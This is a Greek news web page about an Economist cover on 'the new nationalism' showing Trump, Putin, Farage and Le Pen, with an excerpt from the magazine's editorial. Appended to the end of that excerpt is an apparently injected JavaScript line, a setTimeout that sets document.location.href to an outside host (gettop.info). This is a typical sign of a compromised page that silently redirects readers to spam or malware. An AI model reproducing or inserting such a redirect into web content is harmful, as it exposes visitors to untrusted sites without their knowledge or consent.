Πούτιν, Τραμπ, Λεπέν και Φάρατζ μαζί στο πρωτοσέλιδο του Economist

0
12

Ένα εξ’ωφυλλο που απεικονίζει την ανησυχητική πραγματικότητα, όπως διαμορφώνεται μετά την εκλογή του Ντόναλντ Τραμπ στις ΗΠΑ.

Στηλιτεύει την άνοδο των ακροδεξιών και εθνικιστικών φωνών στην Ευρώπη.

Τίτλος του πρωτοσέλιδου: «Ο νέος εθνικισμός» και στο σκίτσο απεικονίζεται -ο Ντόναλντ Τραμπ να χτυπά τα τύμπανα του λαϊκισμού στους ρυθμούς της φλογέρας του Βλαντίμιρ Πούτιν με τη συνοδεία του Νάιτζελ Φάρατζ.

Ακριβώς πίσω τους ως άλλη «Μαριάν» της Γαλλικής Δημοκρατίας ακολουθεί η Μαρίν Λεπέν

economist-1

Ο αρθογράφος στο σχετικό κείμενο σχολιάζει: «Με το κάλεσμά του «πρώτα την Αμερική» ο Τραμπ έγινε ο τελευταίος νεοσύλλεκτος ενός επικίνδυνου εθνικισμού…. Για πρώτη φορά απ’ τον Β’ Παγκόσμιο Πόλεμο οι μεγάλες και οι αναδυόμενες δυνάμεις είναι ταυτόχρονα δέσμιες διάφορων μορφών σωβινισμού. Όπως κι ο κ. Τραμπ, ηγέτες χωρών όπως η Ρωσία, η Κίνα κι η Τουρκία εναγκαλίζονται μια πεσιμιστική άποψη ότι οι διεθνείς υποθέσεις είναι συχνά ένα παιχνίδι μηδενικού αθροίσματος, στο οποίο τα παγκόσμια συμφέροντα ανταγωνίζονται τα εθνικά. Πρόκειται για μια μεγάλη αλλαγή που καθιστά τον κόσμο μας ακόμη πιο επικίνδυνο...» setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here